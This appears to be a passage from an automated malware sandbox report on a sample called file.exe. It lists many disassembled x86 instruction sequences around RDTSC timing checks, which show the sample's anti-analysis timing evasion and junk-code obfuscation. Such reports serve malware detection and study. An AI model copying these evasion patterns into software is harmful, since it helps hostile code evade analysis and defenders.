Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11275DA second address: 11275DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1128F1D second address: 1128F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1129530 second address: 11295C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F0DECD24166h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D1A35h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0DECD24168h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 xor esi, dword ptr [ebp+122D2B52h] 0x00000039 mov edi, dword ptr [ebp+122D36BFh] 0x0000003f mov edi, dword ptr [ebp+12459AA6h] 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F0DECD24168h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 mov edi, ebx 0x00000063 and esi, 24D40553h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c je 00007F0DECD24171h 0x00000072 jmp 00007F0DECD2416Bh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1133957 second address: 113396C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113396C second address: 11339DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0DECD24168h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor edi, dword ptr [ebp+124597D3h] 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+122D1CCDh], eax 0x00000033 push 00000000h 0x00000035 jmp 00007F0DECD24177h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F0DECD2416Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134933 second address: 11349CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0DED622D76h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F0DED622D84h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F0DED622D78h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e jmp 00007F0DED622D7Fh 0x00000033 push 00000000h 0x00000035 sub edi, dword ptr [ebp+122D1C5Bh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F0DED622D78h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jne 00007F0DED622D86h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 pop eax 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113597B second address: 1135989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1139ECC second address: 1139ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113AD7E second address: 113AD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1127D64 second address: 1127D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AD82 second address: 113AD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F0DECD24168h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCBD second address: 113BCC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B326 second address: 112B32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A777 second address: 112A77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCC3 second address: 113BCC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B32A second address: 112B330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCC8 second address: 113BD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0DECD24173h 0x0000000f nop 0x00000010 adc edi, 1F1ACC5Dh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F0DECD24168h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 add bh, 0000000Ah 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F0DECD24168h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov edi, 51050600h 0x00000056 xchg eax, esi 0x00000057 jmp 00007F0DECD2416Eh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 0x00000060 push esi 0x00000061 pop esi 0x00000062 pop esi 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CDA0 second address: 113CE46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0DED622D78h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add bh, 00000044h 0x00000027 push 00000000h 0x00000029 mov ebx, dword ptr [ebp+122D18C7h] 0x0000002f jno 00007F0DED622D86h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F0DED622D78h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov ebx, ecx 0x00000053 xchg eax, esi 0x00000054 push ebx 0x00000055 jl 00007F0DED622D83h 0x0000005b jmp 00007F0DED622D7Dh 0x00000060 pop ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jng 00007F0DED622D78h 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CE46 second address: 113CE50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0DECD24166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CE50 second address: 113CE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132A81 second address: 1132A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132A9D second address: 1132AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DE84 second address: 113DE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133B03 second address: 1133B28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DED622D7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D81h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DE88 second address: 113DEE1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e adc di, 53B1h 0x00000013 push 00000000h 0x00000015 and edi, dword ptr [ebp+122D3723h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F0DECD24168h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 add edi, dword ptr [ebp+122D3563h] 0x0000003d or edi, dword ptr [ebp+122D386Bh] 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jl 00007F0DECD2416Ch 0x0000004c jno 00007F0DECD24166h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132B84 second address: 1132B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134B06 second address: 1134B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F0DECD24166h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114036D second address: 1140376 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134B29 second address: 1134B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140376 second address: 1140399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0DED622D76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DED622D84h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135C11 second address: 1135C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140399 second address: 11403AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D80h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135C2C second address: 1135C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DECD24173h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11403AD second address: 11403CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134C07 second address: 1134C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7DD2 second address: 10E7DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7DD8 second address: 10E7DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136D9F second address: 1136DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136DA3 second address: 1136DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138EAD second address: 1138EB7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138EB7 second address: 1138EBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138F9A second address: 1138F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AFD7 second address: 113AFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BEBE second address: 113BEC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BEC4 second address: 113BECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BECA second address: 113BECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BECE second address: 113BED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BFAE second address: 113BFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E06D second address: 113E073 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E12B second address: 113E132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147FE1 second address: 1147FE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147878 second address: 114787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114787C second address: 1147894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147894 second address: 114789A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114789A second address: 114789E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147A0A second address: 1147A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0DED622D85h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149810 second address: 1149830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DECD24178h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149830 second address: 1149834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9B3 second address: 114D9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9B7 second address: 114D9C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9C1 second address: 114D9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9C5 second address: 114D9F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jmp 00007F0DED622D7Dh 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9F2 second address: 114D9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9F8 second address: 114DA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jne 00007F0DED622DA3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0DED622D84h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DA4D second address: 114DA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DECD24178h 0x00000008 jmp 00007F0DECD24172h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FC92 second address: 114FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0DED622D76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jne 00007F0DED622D76h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCA7 second address: 114FCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCAB second address: 114FCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0DED622D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCB7 second address: 114FCE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0DECD24179h 0x0000000a js 00007F0DECD24166h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCE5 second address: 114FCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCE9 second address: 114FCED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155F18 second address: 1155F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11553A5 second address: 11553B7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0DECD24166h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11553B7 second address: 11553BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155A8C second address: 1155AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0DECD2416Dh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155C1A second address: 1155C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155D63 second address: 1155D85 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F0DECD24166h 0x00000013 jbe 00007F0DECD24166h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155D85 second address: 1155D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155D89 second address: 1155D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A640 second address: 115A64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159455 second address: 1159459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159459 second address: 1159465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159465 second address: 1159469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112BB78 second address: 1108746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F0DED622D87h 0x0000000c nop 0x0000000d movsx ecx, si 0x00000010 lea eax, dword ptr [ebp+124918F1h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F0DED622D78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D2CA5h], ebx 0x00000036 sub dword ptr [ebp+122D1A2Ah], ecx 0x0000003c push eax 0x0000003d push edi 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 jbe 00007F0DED622D76h 0x00000047 popad 0x00000048 pop edi 0x00000049 mov dword ptr [esp], eax 0x0000004c push eax 0x0000004d mov ecx, edx 0x0000004f pop edi 0x00000050 call dword ptr [ebp+122D25D3h] 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C043 second address: 112C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
